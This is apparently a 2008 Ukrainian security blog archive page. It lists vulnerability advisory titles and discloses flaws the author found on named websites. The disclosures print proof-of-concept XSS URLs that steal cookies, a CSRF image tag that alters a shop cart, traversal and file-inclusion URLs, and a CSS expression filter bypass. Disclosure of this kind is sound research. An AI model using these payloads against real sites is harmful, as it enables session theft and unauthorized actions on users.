Архів для категорії 'Уразливості'

Добірка уразливостей

16:33 07.02.2008

В даній добірці уразливості в веб додатках:

  • DBGuestbook 1.1 (dbs_base_path) Remote File Include Vulnerabilities (деталі)
  • DBImageGallery 1.2.2 (donsimg_base_path) RFI Vulnerabilities: (деталі)
  • New mono packages fix integer overflow (деталі)
  • File upload vulnerability in Connectix Boards (деталі)
  • SQL injection vulnerability in Connectix Boards (деталі)
  • PHP remote file inclusion vulnerability in hbm (деталі)
  • SQL injection vulnerability in Design4Online UserPages2 2.0 (деталі)
  • Acunetix WVS <= 4.0 20060717 HTTP Sniffer Component Remote DoS (деталі)
  • HTTP Response Splitting атака в Oracle Portal (деталі)
  • SQL injection vulnerability in VP-ASP Shopping Cart (деталі)
  • Cross-site scripting (XSS) vulnerability in VP-ASP Shopping Cart (деталі)
  • SQL injection vulnerability in uniForum (деталі)
  • PHP-інклюдинг в TextSend (деталі)
  • PHP-інклюдинг в phpProfiles (деталі)
  • Vulnerability in slocate 3.1 (деталі)

Cross-Site Scripting уразливості в CMS SiteEdit

23:49 06.02.2008

Раніше я вже писав про XSS уразливість в CMS SiteEdit, виявлену на http://www.siteedit.ru - сайті виробника даної системи. І ось сьогодні, Олександр, повідомив в коментарях про те, що він виявив ще ряд дір на сайті. Котрі я перевірив і підтвердив їх та виявив ще чималу кількість нових Cross-Site Scripting уразливостей на даному сайті та в CMS SiteEdit (загалом 17 XSS).

XSS:

В скрипті thanks в параметрах formobj_email, formobj_message, formobj_edit, formobj_name, formobj_company, formobj_jobtitle, formobj_site, formobj_address, formobj_telephone, formobj_img, formobj_GoTo, autoreply_text.

http://site/thanks?formobj_email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

В скрипті registration в параметрах login, email, first_name, last_name.

http://site/registration?login=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливості на http://www.siteedit.ru.

XSS:

В скрипті thanks в параметрах formobj_email, formobj_message, formobj_edit, formobj_name, formobj_company, formobj_jobtitle, formobj_site, formobj_address, formobj_telephone, formobj_img, formobj_GoTo, autoreply_text.

В скрипті registration в параметрах login, email, first_name, last_name.

Уразливість на dsec.ru

19:45 06.02.2008

01.09.2007

У лютому, 25.02.2007, я знайшов Cross-Site Scripting уразливість на http://dsec.ru - сайті секюріті компанії Digital Security. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

06.02.2008

XSS:

Дана уразливість вже виправлена. Причому, що є традиційнии для секюріті компаній, мені подякувати вони зовсім забули. Зазначу, що хоча XSS уразливість вони виправили в своїй корзині покупця, але в ній ще є інша уразливість - Cross-Site Request Forgery.

CSRF:

<img src="http://dsec.ru/cart/?addtocart_product_id=35">

Дана уразливість дозволяє додати зазначений товар (також можна вказати його кількість) до корзини покупця. Також можна видаляти товари з корзини (вказавши нульову кількість). Тобто віддалений користувач може маніпулювати корзиною покупця.

Добірка уразливостей

16:25 05.02.2008

В даній добірці уразливості в веб додатках:

  • wu-ftpd fb_realpath() off-by-one bug (деталі)
  • Cross-site scripting (XSS) vulnerability in Magic News Plus 1.0.2 (деталі)
  • PHP remote file inclusion vulnerability in Magic News Plus 1.0.2 (деталі)
  • WebSpell > 4.0 Authentication Bypass and arbitrary code execution (деталі)
  • Online Web Building v2.0 (id) Remote SQL Injection (деталі)
  • Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability: (деталі)
  • DZCP (Devilz Clanportal) <= 1.4.5 Mysql Data viewable (деталі)
  • PHP remote file inclusion vulnerability in Geoffrey Golliher Axiom Photo/News Gallery (axiompng) (деталі)
  • SQL injection vulnerability in @lex Guestbook (деталі)
  • PHP-інклюдинг в cwmVote (деталі)
  • Міжсайтовий скриптінг в Novell: Netware 6.5 SP5-SP6 (деталі)
  • Уразливість при обробці команди PORT в Dream FTP Server (деталі)
  • Multiple directory traversal vulnerabilities in @lex Guestbook (деталі)
  • cacti cmd injection (деталі)
  • PHP-інклюдинг в cwmCounter (деталі)

Уразливості в плагінах для WordPress №7

23:53 04.02.2008

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WassUp, dmsguestbook та Wordspew. Для котрих нещодавно з’явилися експлоіти. WassUp - це плагін для слідкування за відвідуванням сайта, dmsguestbook - це плагін для створення гостьової книги, а Wordspew - це плагін для створення AJAX чата.

  • Wordpress Plugin WassUp 1.4.3 (spy.php to_date) SQL Injection Exploit (деталі)
  • Wordpress Plugin dmsguestbook 1.7.0 Multiple Remote Vulnerabilities (деталі)
  • Wordpress Plugin Wordspew Remote SQL Injection Vulnerability (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливість на www.siteedit.ru

19:27 04.02.2008

30.08.2007

У лютому, 23.02.2007, я знайшов Cross-Site Scripting уразливість на http://www.siteedit.ru - сайті компанії, що займається розробкою CMS та проведенням аудиту безпеки сайтів. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

04.02.2008

XSS:

Дана уразливість досі не виправлена.

Уразливості на websense.com

23:56 02.02.2008

Ще у листопаді, 12.11.2006, я знайшов Cross-Site Scripting, Full path disclosure, Directory Traversal та Local File Inclusion уразливості на http://websense.com - сайті секюріті компанії Websense (зокрема в пошуці по сайту http://search.websense.com). Спочатку я знайшов XSS та Full path disclosure дірки, і поки черга дійшла до публікації дір на даному сайті (що трохи відклалось), вияснилося, що вони вже виправили XSS :-) . Тому я знайшов ще нові Directory Traversal та Local File Inclusion дірки, і відклав на деякий час їх публікацію (що знову відтермінувало цей процес).

І от в минулому місяці я дістався вже до ціх дірок на сайті Websense, але вияснилось, що вони повністю відмовилися від свого попереднього пошукового движка і створили новий (більш простий, але й без дір). Тому опублікую зараз вже неактуальні уразливості (котрі вірогідно так і не були повністю виправлені адмінами сайта, вони просто змінили локальний пошуковець). Саме цікаве в даних уразливостях - це знайдена мною Cross-Site Scripting уразливість, за ради якої варто опублікувати дану інформацію.

Знайдена мною 12.11.2006 XSS уразливість на даному сайті - це новий тип XSS уразливостей, котрий я назвав Remote HTML Include та Remote XSS Include. Про даний тип уразливостей я згадав під час MOSEB в записі Vulnerabilities at images.google.com. В 2007 році з’явилися й публікації інших дослідників про подібні уразливості, але я виявив її першим ще в листопаді 2006, тому являюся першовідкривачем даного типу XSS уразливостей 8-) .

XSS: Remote HTML Include / Remote XSS Include:

http://search.websense.com/highlight/index.html?url=http://websecurity.com.ua/webtools/xss_r.html&fterm=test&la=en&charset=iso-8859-1&search=../query.html%3Fcharset%3Diso-8859-1%26qt%3Dtest

Full path disclosure:

http://search.websense.com/highlight/index.html?url=http%3A//www.websense.com/internet-filtering/index.php&fterm=test%3C&la=en&charset=iso-8859-1&search=../query.html%3Fcharset%3Diso-8859-1%26qt%3Dtest%3C

Directory Traversal:

http://search.websense.com/help/syntax.html?la=/../index

Local File Inclusion:

http://search.websense.com/help/syntax.html?la=/../query

Добірка уразливостей

16:41 02.02.2008

В даній добірці уразливості в веб додатках:

  • SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability (деталі)
  • SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability (деталі)
  • Six Remote Memory Corruption Vulnerabilities in IBM WebSphere MQ 6.0 (деталі)
  • phpTrafficA Local File Inclusion (деталі)
  • FlashGameScript v1.5.4 Remote File Inclusion Vulnerability (деталі)
  • arabhost Remote Incluude File (деталі)
  • JBrowser acces to admin/config files (деталі)
  • Уразливість при обробці даних в WinFtp Server (деталі)
  • Directory traversal vulnerability in GeoIP 1.4.0 (деталі)
  • Переповнення буферу в Sambar FTP Server (деталі)
  • Sun Java security update (деталі)
  • Декілька уразливостей в PHP-Update (деталі)
  • SQL-ін’єкція в Burak Yilmaz Download Portal (деталі)
  • Multiple PHP file inclusion vulnerabilities in WGS-PPC (aka PPC Search Engine) (деталі)
  • SQL injection vulnerability in Motionborg Web Real Estate (деталі)

Уразливості на www.uinc.ru

19:27 01.02.2008

29.08.2007

У лютому, 23.02.2007, я знайшов Cross-Site Scripting уразливості на секюріті проекті http://www.uinc.ru (Underground InformatioN Center). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

01.02.2008

XSS:

POST запит на сторінці http://www.uinc.ru/news/sendnews.php:

"><script>alert(document.cookie)</script>В полях: Тема, Ваше имя, Ваш E-mail.

</textarea><script>alert(document.cookie)</script>В полі: Ваше сообщение.

Дані уразливості вже виправлені, але неякісно. При невеликій модифікації коду три з чотирьох XSS знову працюють.

XSS:

POST запит на сторінці http://www.uinc.ru/news/sendnews.php (IE):

" style="xss:expression(alert(document.cookie))В полях: Тема, Ваше имя, Ваш E-mail.

Добірка уразливостей

16:35 31.01.2008

В даній добірці уразливості в веб додатках:

  • BlueCat Networks Adonis root Privilege Access (деталі)
  • SquirrelMail G/PGP Plugin gpg_help.php Local File Inclusion Vulnerability (деталі)
  • SquirrelMail G/PGP Plugin gpg_check_sign_pgp_mime() Command Injection Vulnerability (деталі)
  • pheap [edit LFI] vulnerability (деталі)
  • LoveCMS 1.4 multiple vulnerabilities (деталі)
  • Plantilla PHP Simple (деталі)
  • Pics Navigator Directory Traversal Vulnerability (деталі)
  • Дві уразливості в HyperACCESS (деталі)
  • FileCOPA FTP Server <= 1.01 (LIST) Remote BoF Exploit (meta) (деталі)
  • Cross-site request forgery (CSRF) vulnerability in SPINE (деталі)
  • Численні уразливості в Sun Java JRE (деталі)
  • Vulnerability in M-Core (деталі)
  • Міжсайтовий скриптінг в Drupal MySite Module (деталі)
  • Sun Java System Content Delivery Server May Allow Unauthorized Viewing of Content Details (деталі)
  • PHP-інклюдинг в CuteNews AJ-Fork (деталі)